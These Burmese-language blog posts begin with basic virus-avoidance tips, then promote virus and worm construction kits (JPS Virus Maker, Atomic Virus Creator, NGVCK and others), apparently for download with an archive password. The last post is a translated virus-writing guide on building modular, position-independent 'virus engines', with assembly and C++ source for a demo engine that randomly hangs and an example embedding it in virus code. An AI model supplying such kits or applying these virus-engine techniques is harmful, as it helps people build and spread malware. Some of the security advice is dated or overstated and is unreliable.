  • ေနာက္တစ္ခုက အသစ္ထြက္လာတဲ႔ Virus ေတြျပန္႔ႏွံ႔ေနတဲ႔ အခ်ိန္နဲ႔ အဲဒီ Virus ေတြရဲ႕ Virus definition ေတြကို update ေပးတဲ႔ အခ်ိန္ ( ဆိုလိုတာကေတာ့ updae ကို သင္ရရွိတဲ႔အခ်ိန္ ) ဟာ အျမဲလိုလုိပဲ နာရီေပါင္းမ်ားစြာ ကြာျခားေနတတ္ပါတယ္... အကယ္၍ သင့္ရဲ႕ ISP ( Internet Service Provider ) က email ေတြကို filter လုပ္ေပးတယ္ဆိုရင္ေတာင္ Virus အသစ္ေတြကိုေတာ့ သင္ရရွိေနအံုးမွာပဲ ျဖစ္ပါတယ္..
  • Virus ေတြဟာ တစ္ခါတရံမွာ သင့္ရဲ႕ Antivirus Software ကို disable လုပ္ႏိုင္ၾကပါတယ္... Popular ျဖစ္ေနတဲ႔ Antivirus Program ေတြကို သံုးမယ္ဆိုရင္ Virus ေတြက အဲဒီ Program ကို သိျပီး terminate လုပ္ပါလိမ့္မယ္...
သင့္ရဲ႕ ISP က Virus protection လုပ္ေပးေနသည့္တုိင္ေအာင္ Virus အကုန္လံုးကိုေတာ့ ရပ္သြားေအာင္ မလုပ္ႏိုင္ပါဘူး။
အေရးၾကီးတာကေတာ့ Email Attachment ေတြ မဖြင့္ခင္ (သို႔) Website ( or porn site) တစ္ခုကေန Softwar ေတြကို download မလုပ္ခင္မွာ သင့္ browser ရဲ႕ disk cache ကိုဖယ္ရွားေပးဖုိ႔လိုပါတယ္... ဘာေၾကာင့္လဲဆိုေတာ့ website ေတြ႔ရဲ႕ Viruses scan အမ်ားစုဟာ Email address ရဖို႔အတြက္ သင့္ဆီကို ေရာက္လာတတ္ပါတယ္...

(၃) Internet Explorer , Mocrosoft Word ( သို႔ ) Outlook Express ေတြကို မသံုးပါနဲ႔

လူသံုးအရမ္းမ်ားတဲ႔ web browser ေတြ၊ လူသံုးမ်ားတဲ႔ word processor ( သို႔ ) Windows Adress Book ေတြကို အသံုးမျပဳသင့္ပါဘူး.. ဘာေၾကာင့္လဲဆိုေတာ့ Netsky virus ကို ဥပမာ တစ္ခုအေနနဲ႔ ၾကည့္ ၾကည့္ပါ။ ၄င္း Virus က သင့္ရဲ႕ Computer ကို Email address ေတြ ရဖို႔အတြက္ scan ေတြဖတ္ပါတယ္...ဖုိင္ အကုန္လံုးကို scan ဖတ္တာေတာ့မဟုတ္ပါဘူး.. ေအာက္ပါ ဖိုင္ types ေတြကို scan ဖတ္ပါတယ္...


.OFT ----- Outlook item template

.DOC ----- Microsoft Word Document

.EMl ----- Outlook Express email message

.WAB ----- Windows Adress Book

.DBX ----- Outlook Express email folder

.RTF ----- Rich Text formet

.TXT ----- Plain Text

ဒါေၾကာင့္ အဲဒီ documents ေတြထဲမွာ ပါ၀င္တဲ႔ email address ေတြကို ရယူျပီး Virus ကေန mail ေတြပို႔ပါတယ္... ေကာင္းတာကေတာ့ တျခား email program ေတြနဲ႔ အျခားအျခားေသာ word processor ေတြကို အသံုးျပဳသင့္ပါတယ္... Microsoft Word ကပဲ word processor အျဖစ္ Available ျဖစ္တာ မဟုတ္ပါဘူး MS ထက္ ေကာင္းတာေတြအမ်ားၾကီး ရွိပါတယ္... ဥပမာ OpenOffice ကိုလည္း MS အစားသံုးလို႔ရပါတယ္... ၄င္းက viruses scan ေတြမဖတ္ႏိုင္ေအာင္ ဖန္တီးထားပါတယ္...
ေနာက္တစ္ခုကေတာ့ Microsoft ရဲ႕ Internet Explorer ( IE ) browser ကိုလည္း အသံုးမျပဳသင့္ပါဘူး.. ဘာလို႔လဲဆိုေတာ့ IE browser ဟာ မလိုအပ္တဲ႔ features ေတြကို user မသိပဲ (သို႔) သေဘာမတူပဲ အလြယ္တကူ ထည့္ေပးႏိုင္လို႔ျဖစ္ပါတယ္.. ( ဥပမာ - search bar - Search bar ေတြကို ဘာေၾကာင့္ ကန္႔သတ္သင့္လဲဆိုေတာ့ အဲဒီ software (search bar) က သင့္ Computer မွာ သင္ရိုက္သမွ် key ေတြ၊ သင္ ၀င္ေရာက္လည္ပတ္သမွ် website ေတြ နဲ႔ သင့္ရဲ႕ Computer ကို အေ၀းကေနအျပည့္အ၀ထိန္းခ်ဳပ္ႏိုင္ဖို႔ အတြက္ အခ်က္အလက္ေတြကို Central hacker ဆီကို ပို႔ေပးဖို႔အတြက္ Adware ေတြ Trojan ေတြ အဲဒီ Search bar မွာပါ၀င္တတ္ပါတယ္....)
U.S government's Computer Emergency Rediness Team ( US-CERT) ကေန Microsoft's Internet Explorer( IE) bowser အသံုးျပဳျခင္းကို ရပ္တန္႔ဖို႔သတိေပးထားပါတယ္.. Vulnerability Note မွာၾကည့္ပါ...

(၄) File-Type ေတြကလည္းသိထားဖို႔လို႔ပါတယ္

Windows ေတြမွာပါတဲ႔ စိုးရိမ္စရာ အျပစ္တစ္ခုကေတာ့ file extension ေတြကို ဖံုးကြယ္ဖို႔ default setting ပါရွိျခင္းျဖစ္ပါတယ္... file extensions ေတြဟာ အလြန္အေရးၾကီးပါတယ္... ဘယ္ေတာ့မွ hidden မလုပ္သင့္ပါဘူး...
သင့္ရဲ႕ computer မွာရွိတဲ႔ ဖိုင္ေတြကို အလြယ္တကူ ခြဲျခားသတ္မွတ္ေပးဖို႔ နဲ႔ ရွာေဖြေတြ႔ရွိဖုိ႔အတြက္ ဖိုင္ ေတြကို ကိုယ္စားျပဳတဲ႔ icons ေတြျပဳလုပ္ထားပါတယ္... အမ်ားအားျဖင့္ေတာ့ document ရဲ႕ types အမ်ိဳးမ်ိဳးမွာ ကိုယ္ပိုင္ icon ေတြရွိၾကပါတယ္... ဥပမယ္.. Adobe Acrobat file ေတြမွာ သိသာေစတဲ႔ icon တစ္ခုရွိပါတယ္... ဒါေပမယ့္ အဲဒီ icon ထဲမွာ ပါ၀င္တဲ႔ Windows Executable file (.exe) ကို သတိထားမိခ်င္မွ ထားမိပါလိမ့္မယ္...ဒါ့အျပင္ တျခား document ေတြနဲ႔ ဆင္တူေနတာေတြလည္း ရွိနိုင္ပါတယ္... ဒါေၾကာင့္ file types ကို ေတြကို သိထားဖို႔အေရးၾကီးပါတယ္...

Extensions ေတြကို ေဖာ္ျပေပးထားပါတယ္...အဲဒီ extensions ေတြပါ၀င္တဲ႔ ဘယ္attachment မဆို virus လို႔ယူဆႏိုင္ပါတယ္...



.BAT ----- DOS batch file

.COM ----- DOS executable file

.CMD ----- Windows 2000 batch file

.CPL ----- Control Panel extension

.HTA ----- HTML application

.JS ----- JScript

.JSE ----- JScript Encoded Script

.LNK ----- Shortcut

.MSI ----- Microsoft installer database

.PIF ----- Shortcut to DOS program

.REG ----- Registary Entries

.SCF ----- Windows Explorer command

.SCR ----- Screen Saver

.VB ----- VB Script

.VBE ----- VB Encoded Script

.VBS ----- VB Script

.WS ----- Windows Script Host

.WSC ----- Windows Script Host - Componet

.WSF ----- Windows Script Host

.WSH ----- Windows Script Host - Setting file

ဒါအျပင္လည္း .EXE file အေနနဲ႔လည္း ရွိပါတယ္... ဒါေပမယ့္ virus မဟုတ္တဲ႔ executable files ေတြလည္း ရွိေနေတာ့ သတိေတာ့ထားဖို႔လိုပါတယ္...အကယ္၍ email ေတြကေနပို႔တဲ႔အခါ ကိုယ္ယံုၾကည္စိတ္ခ်မႈမရွိဘူး ဆိုရင္ မဖြင့္ပါနဲ႔...
ျပီးေတာ့ ဘယ္ OLE document ( OLE document ေတြမွာ Word and Excel documents ေတြပါ၀င္ပါတယ္ ) မဆို viruses ပါ၀င္ႏိုင္တယ္ဆိုတာ မေမ့ပါနဲ႔...
ေနာက္သတိထားရမယ့္ extension တစ္ခုကေတာ့ .ZIP ပါ။ အဲဒီထဲမွာ compressed files ေတြပါ၀င္ပါတယ္... ZIP file ေတြက သူတို႔ထဲမွာ ပါတဲ႔ file ရဲ႕ extensions ေတြကို ဖံုးကြယ္ေပးဖို႔ အသံုး၀င္ေနဆဲျဖစ္ပါတယ္... ဒါေပမယ့္လည္း ZIP လုပ္ထားတဲ႔ Viruses ေတြရဲ႕ file names ေတြမွာ အမွန္တကယ္ဖိုင္ရဲ႕ extension ကို မသိႏိုင္ဖို႔အတြက္ spaces hoping အမ်ားၾကီးရွိတတ္ပါတယ္။ ( ဆိုလိုတာကေတာ့ file name မွာ ("...") ပါ၀င္တာကို ေျပာတာျဖစ္ပါတယ္...)

(၅) E-Mail ဖြင့္ၾကည့္ရင္ သတိထားပါ

ကိုယ္နဲ႔ မသိတဲ႔သူေတြဆီက mail ေတြကို ဖြင့္မဖတ္မိေအာင္ သတိထားဖို႔လြယ္ေပမယ့္ တခါတရံ ကိုယ္နဲ႔ သိတဲ႔သူေတြဆီက virus ပါတဲ႔ mail ေတြကို သတိမျပဳပဲဖြင့္တတ္ၾကပါတယ္... ေအာက္မွာျပထားတဲ႔ အခ်က္ (၄) ခ်က္ေၾကာင့္ သင္နဲ႔ သိတဲ႔သူေတြရဲ႕ နာမည္နဲ႔ viurs ပါတဲ႔ Mail ေတြေရာက္လာႏိုင္ပါတယ္....

သူတို႔ရဲ႕ Computer မွာ ရွိတဲ႔ Software ေတြကေန သူတို႔မသိလိုက္ခင္မွာ သူတို႔ ကိုယ္စား email ေတြပို႔ႏိုင္ပါတယ္။
Software ေတြက တျခားတစ္ေယာက္ဆီကေန သူတို႔ရဲ႕ E-mail address ေတြကို ယူျပီး ပို႔လိုက္တာလည္း ျဖစ္ႏိုင္ပါတယ္။
ေနာက္တခုကေတာ့ သူတို႔ကိုယ္တိုင္ အမွန္တကယ္ ေပးပို႔လိုက္တဲ႔ E-mail ေတြပဲျဖစ္ပါတယ္။
ျပီးေတာ့ spammer ေတြက သင္ E-mail ဖြင့္ဖတ္ျဖစ္ေအာင္ သူတို႔ရဲ႕ နာမည္ေတြကို ေရြးခ်ယ္ျပီး ပို႔လိုက္တာလည္း ျဖစ္နိုင္ပါတယ္။


ဒါေၾကာင့္ တျခားသူတစ္ေယာက္ကေန E-mail ကို attachment နဲ႔ လိုက္တဲ႔အခါ attachment နဲ႔အတူပါလာတဲ႔ E-mail ရဲ႕ body ကို သတိထားၾကည့္ဖို႔လိုက္ပါတယ္...
ေနာက္ျပီး Message headers ကိုလည္း သတိထားရပါမယ္... ဒါေပမယ့္ တခါတရံမွာေတာ့ information အတုအေယာင္ေတြလည္း ျဖစ္ေနတတ္ပါတယ္ ... အမ်ားအားျဖင့္ေတာ့ delivery route ေတြက ယံုၾကည္စိတ္ခ်ႏိုင္ပါတယ္...။

( အခါအခြင့္သင့္လွ်င္ ဆက္လက္ေဖာ္ျပပါမည္။ )

Dec 22 Virus making Tool မ်ား

ဒီ post ကိုတင္သင့္ မတင္သင့္ စဥ္းစားေနရင္းနဲ႔ပဲ တင္ေပးလိုက္ပါတယ္။ ရည္ရြယ္ခ်က္ကေတာ့ Virus ေတြကို ဒီလို Tool ေတြအသံုးျပဳျပီးေတာ့လည္း လုပ္ေနၾကတယ္ဆိုတာရယ္...ေလ့လာေနသူမ်ားအေနနဲ႔ ျပည့္ျပည့္စံုစံု သိသြားေစခ်င္တဲ႔ ေစတနာပါ...။ မည္သူတစ္ဦးတစ္ေယာက္ကိုမွ ထိခုိက္ေစလိုတဲ႔ ရည္ရြယ္ခ်က္မပါ ပါဘူး။

Internet Worm Maker Thing v4


























JPS Virus Maker 3.0


ပံုမွာ ၾကည့္လုိက္တာနဲ႔ ဒီ Tool နဲ႔ virus လုပ္ရတာ ဘယ္ေလာက္လြယ္တယ္ဆိုတာကို သိႏိုင္ပါတယ္...။
























PASSWORD : LoloUOwnRisk



Atomic Virus Creator V.65



ဒါလည္း Virus ဖန္တီးတဲ႔ Tool တစ္ခုျဖစ္ပါတယ္။ အလြန္ Professional က်တဲ႔ Virus ေတြကို ဖန္တီးႏိုင္တဲ႔ Tool တစ္ခုျဖစ္ပါတယ္...။ ဒါအျပင္ မေကာင္းတဲ႔ hacker မ်ားတြက္လည္း အလြန္ အက်ိဳးသက္ေရာက္မႈ ရွိေစတဲ႔ Virus Creator တစ္ခုပါ။



















Next Generation Virus Creation Kit 0.45 Beta


























( Educational Purposes Only)

VIRUS ENGINES

က်ေနာ္ post ေတြမတင္ျဖစ္တာ နဲနဲေတာ့ၾကာေနပါျပီ... လာလည္ၾကတဲ႔ လာအားေပးတဲ႔သူေတြကို အားနာလို႔ ေန႔တိုင္း post တစ္ခုေလာက္ တင္ျဖစ္ေအာင္ ၾကိဳးစားမယ္ဆိုတဲ႔ စိတ္ကူးရွိေပမယ့္လည္း မတင္ျဖစ္ခဲ႔ပါဘူး...။
အခုတစ္ေလာ hacking ပိုင္းေတြပဲ ေရးျဖစ္ေနျပီး virus ေရးသားနည္းေတြနဲ႔ ပတ္သက္တာကို မတင္ျဖစ္တာ ၾကာပါျပီ... ဒါေၾကာင့္ Virus ေရးသားနည္းကုိ ေလ့လာသူမ်ားအတြက္ အဆင္ေျပေစဖို႔ ဒီ post ကို တင္ေပးလုိက္ပါတယ္။


ENGINES

Engines ဆိုတာကေတာ့ binary နဲ႔ source ေတြကို ကိုယ္စားျပဳတဲ႔ လြတ္လပ္တဲ႔ viurs ေရးသားနည္း တစ္ခုျဖစ္ပါတယ္။
 
မိတ္ဆက္

Virus Engine ေတြဟာ C/C++ class ( object ) ေတြနဲ႔ အလြန္ပင္ဆင္တူၾကျပီး၊ တူညီတဲ႔ ဂုဏ္သတၱိေတြလည္း အမ်ားၾကီးရွိၾကပါတယ္။ ဒီဟာႏွစ္ခုလံုးဟာ modularity ကို တိုက္ရိုက္သြားပါတယ္။ တစ္ခုပဲ ကြာျခားမႈရွိတာပါတယ္... အဲဒါကေတာ့ Virus Engine က တိုက္ရိုက္ အေကာင္အထည္ေဖာ္ႏိုင္ျပီး C++ class ကေတာ့ ၾကားခံေပါင္းကူးေပးတဲ႔စနစ္က မ်ားျပားလွပါတယ္။
OOP (Object Oriented Programming ) ကို မိတ္ဆက္ေပးခဲ႔ျပီးသည္ကစလို႔ ယေန႔ဆိုရင္ Virus Engines ဟာ ႏွစ္ေပါင္းမ်ားစြာၾကာခဲ႔ျပီျဖစ္တဲ႔ Programs ေတြကဲ႔သို႔ တူညီတဲ႔ အဆင့္ကို ေရာက္ရွိလာပါျပီ။ ျပီးေတာ့ ယခုအခ်ိန္ဟာ ေျပာင္းလဲဖို႔အခ်ိန္လည္း ျဖစ္ေနပါျပီ။
ဒီ post ရဲ႕ လိုရင္းကေတာ့ Virus Engine ရဲ႕ အဆင္ေျပျပီး အသံုး၀င္တဲ႔ လကၡဏာရပ္ေတြကို ေဖာ္ျပေပးသြားမွာ ျဖစ္ပါတယ္။
Virus ေရးသားျခင္းမွာ လြတ္လပ္တဲ႔ေရးသားနည္းအစိတ္အပိုင္း(modules) မ်ားကို နားလည္ျပီးမွသာလွ်င္ ဒီထဲမွာပါတဲ႔ အေတြးအေခၚပိုင္းကို နားလည္နိုင္မွာျဖစ္ပါတယ္။ဒါ့အျပင္ ဒီpostထဲမွာ LDE32, KME's, ETG, CMIX, DSCRIPT, EXPO, RPME, CODEGEN, PRCG, MACHO နဲ႔ MISTFALL တို႔ရဲ႕ property အားလံုးနီးပါးကို ဒီpostတစ္ခုတည္းနဲ႔ ေဖာ္ျပေပးျပီးသား ျဖစ္သြားမွာ ျဖစ္ပါတယ္။ဒါေတာင္မွ အေရးၾကီးတဲ႔ စံသတ္မွတ္မႈေတြ အားလံုးကို ေဖာ္ျပထားတာမဟုတ္ပဲ စံသတ္မွတ္ဖို႔အတြက္ အနည္းငယ္ကိုသာ ေဖာ္ျပဖို႔ ၾကိဳးစားထားတာ ျဖစ္ပါတယ္။ ဒီေနရာမွာ စံသတ္မွတ္မႈဆိုတာ Engine ရဲ႕ ၾကားခံေပါင္းကူးစနစ္အပို္င္းမွာ လံုး၀နီးပါး သက္ေရာက္လႊမ္းမိုးမႈေတြကို ဆိုလိုတာျဖစ္ျပီး က်န္တဲ႔အပိုင္းေတြက အမ်ားအားျဖင့္ေတာ့ တူညီေနမွာ ျဖစ္ပါတယ္။ ေသခ်ာတာကေတာ့ အလုပ္လုပ္တာခ်င္း တူညီမႈရွိမွာမဟုတ္ပါဘူး။


Code

  • Engine မွာ executable code ေတြသာလွ်င္ ပါ၀င္ရပါမယ္။ ဆိုလိုတာကေတာ့ evident formေတြမွာ data ေတြမပါ၀င္ရပါဘူး။ ၄င္းဟာ code generation ထဲမွာ data ရဲ႕ means အားျဖင့္ စြမ္းေဆာင္ႏိုင္ရပါမယ္။
  • Engine မွာ absolute offset မ်ား မပါ၀င္ရပါဘူး။ ၄င္းဟာ stack နဲ႔ ဒီ structureသို႔ pointer ေျပာင္းေရႊ႕ လိုက္တဲ႔ ေပၚမွာ data structure ဖန္တီးျခင္းရဲ႕ means အားျဖင့္ စြမ္းေဆာင္ႏိုင္ရပါမယ္။
  • Engine မွာ external data structureမ်ား ကို တိုက္ရုိက္အသံုးမျပဳရပါဘူး။ external subroutineမ်ားကို တိုက္ရုိက္ CALL မလုပ္ရပါဘူး။ ၄င္းအစား data နဲ႔ suboroutineမ်ားသို႔ pointerမ်ားကို argumentမ်ားကဲ့သို႔ engine ဆီကို ျဖတ္ေက်ာ္လာေစရပါမယ္။
  • (ေရြးခ်ယ္မႈတစ္ခုအေနနဲ႔)Engine ကုိ system callမ်ား မျပဳလုပ္ေစရပါဘူး။ အဲဒီအစား own subroutineမ်ားသို႔ pointer မ်ားဟာ engine ကိုျဖတ္ေက်ာ္ရပါမယ္။ ျပီးရင္ engine က ၄င္းတို႔ကို ျဖတ္ေက်ာ္ျပီး system subroutine မ်ားကို CALL လုပ္ရပါမယ္။


PUBLIC-functions

  • Parameterမ်ားဟာ stack ေပၚမွာ ျဖတ္ေက်ာ္ေစရပါမယ္။ ( registerမ်ားထဲမွာ မဟုတ္ပါ။)
  • Function result ဟာ( လိုအပ္လွ်င္) EAX ထဲမွာ return ျဖစ္ရပါမယ္။
  • registerမ်ားအားလံုးကို ထိန္းသိမ္းထားရပါမယ္( EAX မွလြဲ၍)။
  • (ေရြးခ်ယ္မႈတစ္ခုအေနနဲ႔) function exit ေပၚမွာ DF flagဟာ 0 (သံုည) ျဖစ္ေစရပါမယ္။ (CLD)
Sources

  • အကယ္၍ Sourceမ်ား ရွိခဲ႔ရင္ Variables, arguments, constants, internal subroutines နဲ႔ အျခား name နဲ႔ lable မ်ားဟာ unique ျဖစ္ရပါမယ္။ user ရဲ႕ sourceမ်ား (သို႔) အျခား engineမ်ားထဲမွ label မ်ားနဲ႔ တထပ္တည္း မျဖစ္ေစရပါဘူး။
  • အကယ္၍ အခ်ိဳ႕ေသာ data structureမ်ား နဲ႔/သို႔ exit codes , engine call ထဲမွာ အသံုးျပဳျခင္း ရွိရင္ ၄င္းတို႔အားလံုးကို သီးျခား .INC file ထဲမွာ ေဖာ္ျပရပါမယ္။
Documentation

  • Engineဟာ documentionအခ်ိဳ႕ အားျဖင့္ ခ်ိတ္ဆက္ရပါမယ္။ ေအာက္မွာျပထားတဲ႔ဟာေတြလိုပဲ ေဖာ္ျပသင့္ပါတယ္...
  • Engine ၊ ၄င္းရဲ႕ algorithm ၊ ၄င္းရဲ႕ အဓိကရည္ရြယ္ခ်က္ ။ ဆိုလိုတာကေတာ့ ၄င္းဟာ ဘာအတြက္ရည္ရြယ္ျပီး ဘယ္လိုေတြ အလုပ္လုပ္သလဲ၊
  • PUBLIC-function အသီးသီးရဲ႕ ေဖာ္ျပခ်က္ နဲ႔ ၄င္းရဲ႕ parameter မ်ား၊
  • (ေရြးခ်ယ္မႈအားျဖင့္) bug မ်ား နဲ႔ အဂၤါရပ္မ်ား၊
  • (ေရြးခ်ယ္မႈအားျဖင့္) engine ကို ဘယ္မွာစမ္းသပ္ျပီးျပီလဲ၊ ၄င္းက ဘယ္မွအလုပ္လုပ္လဲ ၊ မလုပ္ဘူးလဲ။
အေကာင္းဆံုး နည္းလမ္း

  • Engine မွာ PUBLIC-function တစ္ခုတည္း ရွိပါတယ္။ engine ရဲ႕ code အစပုိင္းမွာ( အလယ္မွာျဖစ္ခ်င္ရင္ အစမွာ JMP ကိုသံုး။) ျဖစ္ျပီး ၄င္းရဲ႕ main function မွာ CDECL calling convection (PUSH*n, CALL, RETN, ADD ESP, n*4 ) ရွိပါတယ္။
  • Engine ဟာ on-stack data variableမ်ားကိုသာ အသံုးျပဳပါတယ္။ (argument မ်ားနဲ႔ variables space)
  • Engine ဟာ multithread enviroument ထဲမွာ အလုပ္လုပ္ပါတယ္။ (ဆိုလိုတာကေတာ့ external data structure မ်ားသို႔ pointer မ်ားဟာ engine ဆီကို ျဖတ္ေက်ာ္လာတဲ႔အခါ engine ရဲ႕ တိုးပြားလာတဲ႔ျဖစ္စဥ္ေတြဟာ အဲဒီ့ data structureမ်ားနဲ႔ မွန္မွန္ကန္ကန္ အလုပ္လုပ္ပါလိမ့္မယ္။)
  • Engine ဟာ .386 realmode opcodeမ်ားကို သာလွ်င္အသံုးျပဳပါတယ္။ (ဆိုလိုတာက အားလံုးတစ္ပန္းသာတယ္ (သို႔) .486+ opcodeမ်ား ၊ bswap (သို႔) cmpxchg ကဲ႔သို႔ ပ လပ္ႏိုင္တယ္။)
အက်ိဳးရလဒ္မ်ား

အထက္မွာေဖာ္ျပခဲ႔တဲ႔ အဂၤါရပ္မ်ား အားလံုးကိုအသံုးျပဳျခင္းအားျဖင့္ engine code ဟာ OS ၊ ring0/3 နဲ႔ engine တည္ရွိရာ offset မွ လြတ္ေျမာက္လာႏိုင္ပါလိမ့္မယ္။ code ကဲ႔သို႔ ေပါင္းစပ္ႏိုင္ပါလိမ့္မယ္...ဆိုလိုတာကေတာ့ ဘယ္ညႊန္ၾကားခ်က္မ်ားကိုမဆို အလြယ္တကူ စိစစ္ႏိုင္ျခင္း၊ ဖယ္ရွားႏိုင္ျခင္း နဲ႔/သို႔ အစားထိုးလဲလွယ္နိုင္ျခင္းမ်ား ျပဳလုပ္ႏိုင္ပါတယ္။ ဒီလိုမ်ား engineမ်ားရဲ႕ Code (သို႔) sourceမ်ားကို အျခား ဘယ္engineမ်ားမွာမဆို (သို႔) viruseမ်ား၊ virus constructorမ်ား (သို႔) generatorမ်ား (သို႔) virus pluginမ်ား ထဲသို႔ေျပာင္းထည့္ျခင္းမ်ား အားျဖင့္ လြယ္ကူစြာအသံုးျပဳႏိုင္ပါတယ္။
ဒါ့အျပင္ asm- ၊ cpp- code မ်ားနဲ႔ ခ်ိတ္ဆက္ထားတဲ႔ လုပ္ငန္းတာ၀န္မ်ားကိုလည္း .obj fileမ်ား အသံုးမျပဳပဲ ေျဖရွင္းႏိုင္ပါတယ္။
 
ဥပမာ

Engine : KILLER ။ ရည္မွန္းခ်က္ပန္းတိုင္ : 1/1000 ရဲ႕ ျဖစ္ႏိုင္ေျခနဲ႔ ဟန္႔တားထစ္ေနေစဖို႔ ။


----[begin KILLER.ASM]--------------------------------------------------

; KILLER engine version 1.00 FREEWARE

; action: hangup with probability of 1/1000;

; CDECL calling convention;

; 5 arguments;

; no return value, no registers modified

killer_engine           proc    c

                    arg     user_param  ; user-data

                    arg     user_random ; external randomer

                    arg     arg1

                    arg     arg2        ; other parameters

                    arg     arg3

                    pusha

                    cld

                    ;;

                    push    1000

                    push    user_param  ; maybe ptr to some struct

                    call    user_random ; call external subroutine

                    add     esp, 8

                    ;;

                    cmp     eax, 666

                    je      $

                    ;;

                    popa

                    ret                 ; TASM produces LEAVE+RETN

                    endp

----[end KILLER.ASM]----------------------------------------------------
ASM include file ျဖစ္ေပၚေစပါတယ္...:

----[begin KILLER.INC]--------------------------------------------------

; GENERATED FILE. DO NOT EDIT.

; KILLER 1.00 engine

killer_engine_size equ 30

killer_engine:

db 0C8h,000h,000h,000h,060h,0FCh,068h,0E8h

db 003h,000h,000h,0FFh,075h,008h,0FFh,055h

db 00Ch,083h,0C4h,008h,03Dh,09Ah,002h,000h

db 000h,074h,0FEh,061h,0C9h,0C3h

----[end KILLER.INC]----------------------------------------------------
ေအာက္မွာေဖာ္ျပထားတာကလည္း အတူတူပါပဲ...ဒါေပမယ့္ C/C++ ထဲမွာ :

----[begin KILLER.CPP]--------------------------------------------------

// GENERATED FILE. DO NOT EDIT.

// KILLER 1.00 engine

#define killer_engine_size 30

BYTE killer_engine_bin[killer_engine_size] =

{

0xC8,0x00,0x00,0x00,0x60,0xFC,0x68,0xE8,

0x03,0x00,0x00,0xFF,0x75,0x08,0xFF,0x55,

0x0C,0x83,0xC4,0x08,0x3D,0x9A,0x02,0x00,

0x00,0x74,0xFE,0x61,0xC9,0xC3

};

----[end KILLER.CPP]----------------------------------------------------

----[begin KILLER.ASH]--------------------------------------------------

; KILLER 1.00 engine

KILLER_VERSION          equ     0100h

----[end KILLER.ASH]----------------------------------------------------
C/C++ header file:



----[begin KILLER.HPP]--------------------------------------------------

// KILLER 1.00 engine

#ifndef __KILLER_HPP__

#define __KILLER_HPP__



#define KILLER_VERSION  0x0100



typedef

void __cdecl killer_engine(

            DWORD   user_param,             // user-parameter

            DWORD __cdecl user_random(DWORD user_param, DWORD range),

            DWORD   arg1,

            DWORD   arg2,

            DWORD   arg3);



#endif //__KILLER_HPP__

----[end KILLER.HPP]----------------------------------------------------
အသံုးျပဳပံု ဥပမာ ၊ ASM ထဲတြင္...



----[begin EXAMPLE.ASM]-------------------------------------------------

; KILLER 1.00 usage example

include                 killer.ash



callW                   macro   x

                    extern  x:PROC

                    call    x

                    endm



v_data                  struc

v_randseed              dd      ?

;                       ...

                    ends



                    p386

                    model   flat

                    locals  __



                    .data

                    dd      ?

                    .code



start:                  call    virus_code

                    push    -1

                    callW   ExitProcess



virus_code:             pusha

                    sub     esp, size v_data

                    mov     ebp, esp

                    ;;

                    callW   GetTickCount

                    xor     [ebp].v_randseed, eax  ; randomize

                    ;;

                    push    3

                    push    2           ; parameters

                    push    1

                    call    5+2       ; push pointer to randomer

                    jmp     short my_random

                    push    ebp         ; user-param == v_data ptr

                    call    killer_engine

                    add     esp, 4*5

                    ;;

                    add     esp, size v_data

                    popa

                    retn



; DWORD __cdecl random(DWORD user_param, DWORD range)

;                       [esp+4]        [esp+8]

my_random:              mov     ecx, [esp+4]   ; v_data ptr

                    mov     eax, [ecx].v_randseed

                    imul    eax, 214013

                    add     eax, 2531011

                    mov     [ecx].v_randseed, eax

                    shr     eax, 16

                    imul    eax, [esp+8]

                    shr     eax, 16

                    retn



;killer_engine:

include                 killer.inc



virus_size              equ     $-virus_code

                    end     start

----[end EXAMPLE.ASM]---------------------------------------------------
အသံုးျပဳပံု ဥပမာ၊ C/C++ ထဲတြင္...



----[begin EXAMPLE.CPP]-------------------------------------------------

#include <windows.h>

#pragma hdrstop

#include "killer.hpp"

#include "killer.cpp"

struct v_struct

{

DWORD rseed;

//...

};

DWORD __cdecl my_random(DWORD user_arg, DWORD range)

{

v_struct* v = (v_struct*) user_arg;

return range ? (v->rseed = v->rseed * 214013 + 2531011) % range : 0;

}

void main()

{

v_struct* v_data = (v_struct*) GlobalAlloc( GPTR, sizeof(v_struct) );

v_data->rseed = GetTickCount();  // randomize

void* engine_ptr = &killer_engine_bin;

(*(killer_engine*)engine_ptr)((DWORD)v_data, my_random, 1,2,3);

}

----[end EXAMPLE.CPP]---------------------------------------------------
engine ကို compileျပဳလုပ္ရန္ ဥပမာ program



----[begin BUILD.ASM]---------------------------------------------------

                    p386

                    model   flat

                    locals  __

                    .data

                    db      0EBh,02h,0FFh,01h       ; signature

include                 killer.asm

                    db      0EBh,02h,0FFh,02h       ; signature

                    .code

start:                  push    -1

                    callW   ExitProcess

                    end     start

----[end BUILD.ASM]-----------------------------------------------------
ယခင္ file မွ binary(DB,DB,...)ထဲတြင္ rip ျဖစ္ဖို႔ ဥပမာ program



----[begin HAXOR.CPP]---------------------------------------------------

#include <windows.h>

#include <stdio.h>

#include <stdlib.h>

#include <io.h>

#pragma hdrstop

void main()

{

FILE*f=fopen("build.exe","rb");

int bufsize = filelength(fileno(f));

BYTE* buf = new BYTE[bufsize+1];

fread(buf, 1,bufsize, f);

fclose(f);

int id1=0, id2=0;

for (int i=0; i<bufsize; i++)

{

if (*(DWORD*)&buf[i] == 0x01FF02EB) id1=i+4;        // check signature

if (*(DWORD*)&buf[i] == 0x02FF02EB) id2=i;          // check signature

}

f=fopen("killer.inc","wb");

fprintf(f,"; GENERATED FILE. DO NOT EDIT.\r\n");

fprintf(f,"; KILLER 1.00 engine\r\n");

fprintf(f,"killer_size equ %i\r\n", id2-id1);

fprintf(f,"killer_engine:\r\n", id2-id1);

for (int i=0; i<id2-id1; i++)

{

if ((i%8)==0) fprintf(f,"db ");

fprintf(f,"0%02Xh", buf[id1+i]);

if (((i%8)==7)||(i==id2-id1-1)) fprintf(f,"\r\n"); else fprintf(f,",");

}

fclose(f);

f=fopen("killer.cpp","wb");

fprintf(f,"; GENERATED FILE. DO NOT EDIT.\r\n");

fprintf(f,"// KILLER 1.00 engine\r\n");

fprintf(f,"#define killer_engine_size %i\r\n",id2-id1);

fprintf(f,"BYTE killer_engine_bin[killer_engine_size] = {\r\n");

for (int i=0; i<id2-id1; i++)

{

if ((i%8)==0) fprintf(f,"  ");

fprintf(f,"0x%02X", buf[id1+i]);

if (i!=id2-id1-1) fprintf(f,",");

if ((i%8)==7) fprintf(f,"\r\n");

}

fprintf(f," };\r\n");

fclose(f);

}

----[end HAXOR.CPP]-----------------------------------------------------

